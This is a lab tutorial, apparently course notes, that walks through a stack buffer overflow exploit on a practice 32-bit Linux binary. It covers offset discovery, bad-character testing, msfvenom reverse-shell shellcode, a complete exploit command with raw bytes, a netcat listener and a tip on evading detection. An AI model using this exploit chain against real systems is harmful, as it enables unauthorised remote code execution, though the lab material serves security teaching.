Buffer Overflow - Day Two - Code Execution

Setup #

We need to install several tools: #

Install metasploit:

sudo snap install metasploit-framework

Install ruby:

sudo snap install ruby --classic

gem install --user-install rex-text

Install git if needed

sudo apt install git

Clone the metasploit repository

git clone https://github.com/rapid7/metasploit-framework.git

Move the repository to its proper place

sudo mv metasploit-framework/ /usr/share/

To make our lives easier, we’ll also be installing python2.7 because it handles raw bytes in a [less secure] way that actually helps us.


sudo apt update

wget http://security.ubuntu.com/ubuntu/pool/universe/p/python2.7/python2.7_2.7.18-13ubuntu1.5_amd64.deb http://security.ubuntu.com/ubuntu/pool/universe/p/python2.7/libpython2.7-stdlib_2.7.18-13ubuntu1.5_amd64.deb http://security.ubuntu.com/ubuntu/pool/universe/p/python2.7/python2.7-minimal_2.7.18-13ubuntu1.5_amd64.deb http://security.ubuntu.com/ubuntu/pool/universe/p/python2.7/libpython2.7-minimal_2.7.18-13ubuntu1.5_amd64.deb

sudo apt install ./libpython2.7-minimal_2.7.18-13ubuntu1.5_amd64.deb ./libpython2.7-stdlib_2.7.18-13ubuntu1.5_amd64.deb ./python2.7-minimal_2.7.18-13ubuntu1.5_amd64.deb ./python2.7_2.7.18-13ubuntu1.5_amd64.deb

After this, we can confirm that it’s been installed correctly by checking the version:

python2.7 --version

Determining The Offset #

The offset is used to determine how many bytes are needed to overwrite the buffer and how much space we have around our shellcode.

Shellcode is a program code that contains instructions for an operation that we want the CPU to perform. The manual creation of the shellcode will be discussed in more detail in other modules. But to save some time first, we use the Metasploit Framework (MSF) that offers a Ruby script called “pattern_create” that can help us determine the exact number of bytes to reach the EIP. It creates a unique string based on the length of bytes you specify to help determine the offset.

From the metasploit framework that we just install, we’ll use a ruby script that creates a unique string for us that we feed to the program in order to determine where the eip register starts.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1200 > pattern.txt

cat pattern.txt

This is the pattern we’ll feed into the program.

To do this, we’ll start gdb

gdb -q bow32

and then we can run a similar print command as we did on tuesday. This time though, we’ll feed the string we just generated instead of 1200 U’s.

(gdb) run $(python2.7 -c "print 'Aa0Aa1Aa2Aa3Aa4Aa5..<truncated>..Bn7Bn8Bn9'")

We’ll see at the bottom of the output that it still failed, however, it gave us a value found in the pattern now located in the eip due to it being not a real address.

We can further confirm this by using gdb to inspect the eip register

(gdb) info registers eip

Copy the value down into a note pad for next step. In my case: 0x69423569

Now we can use another ruby script provided by metasploit to calculate the offset based on that value.

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x69423569

All this script is doing under the hood is converting the hex and then matching it to the position in that pattern string we used. We see that its an offset of 1036.

We can confirm this to be the correct offset by now trying to write our own data directly into the EIP register. We’ll insert 4 “f” characters, which is the hex x66

# First start gdb with the bow32 binary
gdb -w bow32

# run the binary but this time, we'll print 1036 U's and then 4 f's to fill the EIP register.
(gdb) run $(python2.7 -c "print '\x55' * 1036 + '\x66' * 4")

We can again confirm by printing the values in the EIP register:

(gdb) info registers eip

Determining the length for shell code #

We first need to generate shellcode in order to determine it’s size. We can use another tool that is bundled with metasploit called msfvenom. This tool is used to generate payloads for a wide variety of operating systems using a wide range of methods.

In this instance, we’ll be using a payload that generates a reverse shell using tcp traffic. When executed, it will reach out to our local host (127.0.0.1) on port 31337. It’ll obviously be for the linux platform in the x86 architecture, and we ultimately want C code.

msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=31337 --platform linux --arch x86 --format c

We can see that our payload will end up being 68 bytes in size.

Based off this, we can perform some calculations for total size we need to utilize.As a precaution, we should try to take a larger range if the shellcode increases due to later specifications.

Often it can be useful to insert someno operation instruction(NOPS) before our shellcode begins so that it can be executed cleanly. Let us briefly summarize what we need for this:

We need a total of 1040 bytes to get to theEIP.
Here, we can use an additional100 bytesofNOPs
150 bytesfor ourshellcode.

Buffer = "\x55" * (1040 - 100 - 150 - 4) = 786
     NOPs = "\x90" * 100
Shellcode = "\x44" * 150
      EIP = "\x66" * 4

Using this math, we can craft our payload to confirm the amount of space we have to utilize:

$(python2.7 -c 'print "\x55" * (1040 - 100 - 150 - 4) + "\x90" * 100 + "\x44" * 150 + "\x66" * 4')

With this, we confirmed that our shell code could grow to a total of 250 bytes, because as the shellcode grows, it’ll simply eat of the Null Bytes that proceeded it.

Identifying Bad Characters #

Bad Characters are those reserved for file identifications and that can not be included our payload else it will fail.

To start, we need a list of all possible bad characters:

CHARS="\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

This list is 256 bytes long.

We’re going to be sending this list to our program and then inspecting the memory, so we actually need adjust our buffer zone by that number of characters.

Buffer = "\x55" * (1040 - 256 - 4) = 780
 CHARS = "\x00\x01\x02\x03\x04\x05...<SNIP>...\xfd\xfe\xff"
   EIP = "\x66" * 4

The new size of our buffer is 780

In order to actually inspect the memory, we need to set a breakpoint on the bowfunc function.

(gdb) break bowfunc

Now we can send our payload

(gdb) run $(python2.7 -c 'print "\x55" * (1040 - 256 - 4) + "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" + "\x66" * 4')

We’ll see that execution stops at the breakpoint we set.

From here, we want to inspect the memory to look for any bytes that were removed.

(gdb) x/2000xb $esp+500

What this command is saying is:

x - Examine memory
/2000 - Show 2000 items
x - print each item in hex
b - display the items in 1 byte chunks
$esp+500 - start displaying items at ESP +500

This starts displaying the memory, and we’ll want to hit c + enter to view the whole page.

And what we’re looking for is our whole section x55.

At the end of this section is where our character list starts

Looking at this list, we’ll see that the first 0x00 is missing. This is because 0x00 is a null byte and almost always removed.

With this information. We’re going to remove that item from our list, decrement our count by 1 (256 becomes 255), and then try the command again.

run $(python2.7 -c 'print "\x55" * (1040 - 255 - 4) + "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" + "\x66" * 4')

Inspecting the memory again, we see that the next missing value is 0x09

So we’ll again remove this from our list, and decrement the count

run $(python2.7 -c 'print "\x55" * (1040 - 254 - 4) + "\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" + "\x66" * 4')

This time you’ll notice that 0x0a is missing.

You need to repeat this until you have no more missing values as each value removed is a value that would interrupt the flow of execution.

run $(python2.7 -c 'print "\x55" * (1040 - 253 - 4) + "\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" + "\x66" * 4')

0x20 is missing now.

As a hint, this is the last bad character, and we can stop.

The identified bad characters are:

\x00 \x09 \x0a \x20

Generating our shellcode #

Now that we’ve calculated our offset and identified any bad characters, we can generate our shellcode, this is the actual code that will be executed on in the buffer overflow attack.

We’re going to use msfvenom, like before, and just pass it an additional flag containing our bad characters

msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=31337 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out shellcode

This saves the shellcode in a file called shellcode. In order to copy and paste it, we need to open the file and make the entire shell code into a single string.

code shellcode

We can now send this payload to our program essentially as a dry run

run $(python2.7 -c 'print "\x55" * (1040 - 124 - 95 - 4) + "\x90" * 124 + "\xda\xc6\xb8\x9b\xc8\xb8\xc8\xd9\x74\x24\xf4\x5f\x33\xc9\xb1\x12\x31\x47\x17\x03\x47\x17\x83\x5c\xcc\x5a\x3d\x53\x16\x6d\x5d\xc0\xeb\xc1\xc8\xe4\x62\x04\xbc\x8e\xb9\x47\x2e\x17\xf2\x77\x9c\x27\xbb\xfe\xe7\x4f\x43\x01\x18\x8e\xd3\x03\x18\xea\x4a\x8d\xf9\xba\xeb\xdd\xa8\xe9\x40\xde\xc3\xec\x6a\x61\x81\x86\x1a\x4d\x55\x3e\x8b\xbe\xb6\xdc\x22\x48\x2b\x72\xe6\xc3\x4d\xc2\x03\x19\x0d" + "\x66" * 4')

When we again go and inspect the memory, we can see that our shell is now safely in the buffer area of the memory.

x/2000xb $esp+550

We’ll look for the 0x55, then we’ll see the 0x90’s, and then we’ll see our shell code start:

Choosing a return address #

The last step in this flow is to pick a return address. Instead of placing x66 into the EIP, we’ll place this address instead.

This address needs to be located inside of the NOP area. The EIP will tell the program to jump back to that location, and then execute the bytes going forward in order. It will skip over the NOP bytes (because they are literally No Operation bytes), then execute our shell code.

Note that it doesn’t really matter, which line in the NOP section you choose. You can just pick one in the middle. In my case, I’m choosing: 0xffffd102

Note that because modern desktop linux using the little endian format. We actually need to apply in reverse order.

\x02 \xd1 \xff \xff
\x02\xd1\xff\xff

So our new full command, with the EIP replaced, is going to be:

run $(python2.7 -c 'print "\x55" * (1040 - 124 - 95 - 4) + "\x90" * 124 + "\xda\xc6\xb8\x9b\xc8\xb8\xc8\xd9\x74\x24\xf4\x5f\x33\xc9\xb1\x12\x31\x47\x17\x03\x47\x17\x83\x5c\xcc\x5a\x3d\x53\x16\x6d\x5d\xc0\xeb\xc1\xc8\xe4\x62\x04\xbc\x8e\xb9\x47\x2e\x17\xf2\x77\x9c\x27\xbb\xfe\xe7\x4f\x43\x01\x18\x8e\xd3\x03\x18\xea\x4a\x8d\xf9\xba\xeb\xdd\xa8\xe9\x40\xde\xc3\xec\x6a\x61\x81\x86\x1a\x4d\x55\x3e\x8b\xbe\xb6\xdc\x22\x48\x2b\x72\xe6\xc3\x4d\xc2\x03\x19\x0d" + "\x02\xd1\xff\xff"')

Prior to executing this, however, we need to start our reverse shell listener, so we actually have something to capture. We’ll use a program netcat to do this

nc -nlvp 31337

Now we can execute our payload in gdb

You’ll likely hit the breakpoint if you haven’t exited gdb since we set it, you can just enter continue + enter and the program will continue

(gdb) continue

If you check our netcat listener, you’ll see that we have received a connection.

You can now run commands, as an example:

id

Close the shell using CTL + C, in gdb you’ll see that the program continues as normal. Up until that point, the program was essentially paused at the point of shell execution. In a real exploitation scenario, you’ll likely have to write shell code that spawn a new process, and migrates the shell to that process, before allowing the program to continue. You’d want this done quickly in order to avoid detection.